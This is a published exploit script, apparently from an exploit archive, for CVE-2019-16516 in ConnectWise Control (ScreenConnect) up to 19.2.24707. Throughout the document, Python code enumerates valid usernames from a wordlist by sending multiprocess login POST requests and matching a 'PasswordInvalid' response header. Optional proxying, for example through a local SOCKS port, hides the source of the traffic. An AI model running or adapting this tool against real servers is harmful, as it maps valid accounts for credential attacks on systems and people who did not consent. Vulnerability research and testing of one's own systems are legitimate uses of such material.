# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration # Date: 17/12/2021 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://www.connectwise.com/ # Version: vulnerable <= 19.2.24707 # CVE : CVE-2019-16516 # https://github.com/czz/ScreenConnect-UserEnum from multiprocessing import Process, Queue from statistics import mean from urllib3 import exceptions as urlexcept import argparse import math import re import requests class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' headers = [] def header_function(header_line): headers.append(header_line) def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy): try: # Payload to dictionary payload_dict = {} for load in payload: split_load = load.split(":") if split_load[1] != '{USER}': payload_dict[split_load[0]] = split_load[1] else: payload_dict[split_load[0]] = '{USER}' # Enumeration total = len(wordlist) for counter, user in enumerate(wordlist): user_payload = dict(payload_dict) for key, value in user_payload.items(): if value == '{USER}': user_payload[key] = user dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1] headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies) x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items()) if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')): queue.put((proc_id, "FOUND", user)) found_queue.put((proc_id, "FOUND", user)) if stop: break elif verbose: queue.put((proc_id, "TRIED", user)) queue.put(("PERCENT", proc_id, (counter/total)*100)) except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError): print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id)) if __name__ == "__main__": # Arguments parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool") parser.add_argument("url", help="http://example.com/Login") parser.add_argument("wordlist", help="username wordlist") parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems") parser.add_argument("-v", action="store_true", help="verbose mode") parser.add_argument("-s", action="store_true", help="stop on first user found") parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050") args = parser.parse_args() # Arguments to simple variables wordlist = args.wordlist url = args.url payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:'] verbose = args.v thread_count = args.c failstr = "PasswordInvalid" stop = args.s proxy= args.p print(bcolors.HEADER + """ __ ___ __ ___ | | |__ |__ |__) |__ |\ | | | |\/| |__| ___| |___ | \ |___ | \| |__| | | ScreenConnect POC by czz78 :) """+ bcolors.ENDC); print("URL: "+url) print("Payload: "+str(payload)) print("Fail string: "+failstr) print("Wordlist: "+wordlist) if verbose: print("Verbose mode") if stop: print("Will stop on first user found") proxies = {'http': '', 'https': ''} if proxy: proxies = {'http': proxy, 'https': proxy} print("Initializing processes...") # Distribute wordlist to processes wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8 tothread = 0 wllist = [[] for i in range(thread_count)] for user in wlfile: wllist[tothread-1].append(user.strip()) if (tothread < thread_count-1): tothread+=1 else: tothread = 0 # Start processes tries_q = Queue() found_q = Queue() processes = [] percentage = [] last_percentage = 0 for i in range(thread_count): p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy)) processes.append(p) percentage.append(0) p.start() print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC) # Main process loop initial_count = len(processes) while True: # Read the process output queue try: oldest = tries_q.get(False) if oldest[0] == 'PERCENT': percentage[oldest[1]] = oldest[2] elif oldest[1] == 'FOUND': print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) elif verbose: print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) except: pass # Calculate completion percentage and print if /10 total_percentage = math.ceil(mean(percentage)) if total_percentage % 10 == 0 and total_percentage != last_percentage: print("{}% complete".format(total_percentage)) last_percentage = total_percentage # Pop dead processes for k, p in enumerate(processes): if p.is_alive() == False: processes.pop(k) # Terminate all processes if -s flag is present if len(processes) < initial_count and stop: for p in processes: p.terminate() # Print results and terminate self if finished if len(processes) == 0: print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC) while True: try: entry = found_q.get(False) print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC) except: break quit()